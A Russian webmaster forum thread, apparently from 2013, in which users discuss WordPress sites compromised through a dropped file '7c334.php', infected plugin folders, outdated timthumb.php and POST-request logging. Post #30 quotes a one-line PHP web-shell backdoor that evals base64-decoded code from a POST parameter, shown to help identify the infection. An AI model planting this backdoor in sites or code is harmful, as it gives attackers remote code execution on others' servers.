Форум Сайтостроение Администрирование серверов

WP + 7c334.php

1 2345678 9
Romka_Kharkov
На сайте с 08.04.2009
Offline
485
Romka_Kharkov
#21
Andreyka:
У меня есть сайт под буржунет на вкусную тематику
Последний WP - и все равно ломают
Вылечил закрытием всех пост запросов кроме моего IP

OMG :D

А посетители POST Не создают? ;)

---------- Добавлено 04.07.2013 в 17:17 ----------

Maneki:
?
нет. я не знаю такого слова.

Ну это по простому "сильно повезло" :D

---------- Добавлено 04.07.2013 в 17:38 ----------

// Посмотрел что там в залитый файлик струячат постом... ничего нового, банальный спам. через mail() ;(

Есть около 15.000 ipv4 !!! (http://onyx.net.ua/price.php#ipv4) Качественный хостинг с 2005 года - лучшее клиентам! (http://onyx.net.ua/)
Аудитория проектов Mail.Ru Group Объем рынка интернет-рекламы в Google My Business API
SeVlad
На сайте с 03.11.2008
Offline
1609
SeVlad
#22
Romka_Kharkov:
Толково.....

Romka_Kharkov, ну то был как бэ намёк, на то, о чём ты и так в курсе ;)

1. Дыры могут быть и в плагинах и в темах (что чаще), взятых непонятно где.

2. Логи должны же что-то рассказать.

Ида, имени файла как бэ мало. Инфы воообще почти никакой в старпосте. Да, собсно, и вопрос такой себе... Какой вопрос - такой ответ, если будет угодно ;)

АПД. А, да, в 352 есть несколько багфиксов связанных с безопасностью.

---------- Добавлено 04.07.2013 в 18:19 ----------

Romka_Kharkov:
// Посмотрел что там в залитый файлик струячат постом... ничего нового, банальный спам. через mail() ;(

О, это уже интересно, бо жалобы на спам с домена я уже пару раз встречал.

Где он находится? в "wp-content/plugins/wp_api/" ?

Делаю хорошие сайты хорошим людям. Предпочтение коммерческим направлениям. Связь со мной через http://wp.me/P3YHjQ-3.
Зачем модуль Здоровье сайта На Замок - сервис Посоветуйте движок для статейника
Romka_Kharkov
На сайте с 08.04.2009
Offline
485
Romka_Kharkov
#23
SeVlad:
.........

Вот мне интересно, если ты такой понимающий ;)))) То почему перво пост не читал? ;))) Я же не спрашивал "помогите, что мне делать", я полагал получить ответы типа этих: "да я вот сталкивался, это дыра в модуле таком-то"..... и тому подобными :D ОПЫТ ..... а теорий у самого достаточно :D

Еще есть папки:

./wp-content/plugins/wp_add

./wp-content/plugins/wp_404

./wp-content/themes/MyCinema

Тут тоже были зараженные файлы, но это уже не суть важно, я уже писал выше, что после взлома они могут быть ГДЕ угодно... :) Но я взял акаунтов парочку, изучил , погрепал, попарсил.... Вроде вынял все явные eval() И base64_decode().

Нужна помощь. Снижение трафика Robots.txt для вордпресса Все вопросы по robots.txt
VO
На сайте с 27.07.2008
Offline
149
V(o)ViK
#24

Romka_Kharkov, timthumb.php ? Обычно все обновляют, а timthumb остается старый из кастом темы.

---------- Добавлено 04.07.2013 в 19:12 ----------

Дальше включаем лог POST запросов и ждем.

Обычно все очень быстро и просто понятно.

SeVlad
На сайте с 03.11.2008
Offline
1609
SeVlad
#25
Romka_Kharkov:
я полагал получить ответы типа этих: "да я вот сталкивался, это дыра в модуле таком-то"..

Извини, с телепатией у меня сегодня туго ;) Я отвечал ровно на то что ты написал\спрашивал.

Romka_Kharkov:
ОПЫТ

Да, с этим напряжно.. Клиентских сайтов - сколько хош лечил\защищал, а вот моих и тех, которые в обслуживании - как-то не ломают. Почему-то ;)

V(o)ViK:
timthumb.php ? Обычно все обновляют, а timthumb остается старый из кастом темы.

Это да, но и в старых дефолтных темах он пофикшен (за классик и др с 2-ки говорить не буду - тут хз. Но маловероятно что бы их кто-то юзал\держал на хостинге). А вот из взятых на помойке - тут возможно всё.

Searchengines 4.0 запускаем! Rambler: Как понять пользователя Как найти менеджера по
Romka_Kharkov
На сайте с 08.04.2009
Offline
485
Romka_Kharkov
#26

// Пока что была всего 1 попытка, попасть на другой файлик из набора сломанных, получил 404 ... и пока все :(

Жду пролома :S

[Удален]
#27

Romka_Kharkov, и я уже заметил эту же беду у клиентов. Иду уточню что клиент менял, так как после зловред пропал.

[Удален]
#28

Решение банальное: обновление к последней версии и минимизация плагинов.

В принципе то чего нужно придерживаться на любой кмс.

Romka_Kharkov
На сайте с 08.04.2009
Offline
485
Romka_Kharkov
#29
WapGraf:
Решение банальное: обновление к последней версии и минимизация плагинов.
В принципе то чего нужно придерживаться на любой кмс.

А вы уважаемый багу нашли? Или просто удалили все и скачали новый WP без плагинов, если путь номер 2 , то это ни о чем не говорит и ничего у вас не порешалось, ждите пока по новой появится...

У MyTracker появилось четыре В работе WordPress 5.5 Yahoo предлагает новый поиск
K5
На сайте с 21.07.2010
Offline
209
kgtu5
#30
<?php if(isset($_POST["cod\ x65"])){eval(base64_decode($_POST["co\ x64e"]));}
?>

такое содержание у файла ?

аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!
1 2345678 9

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий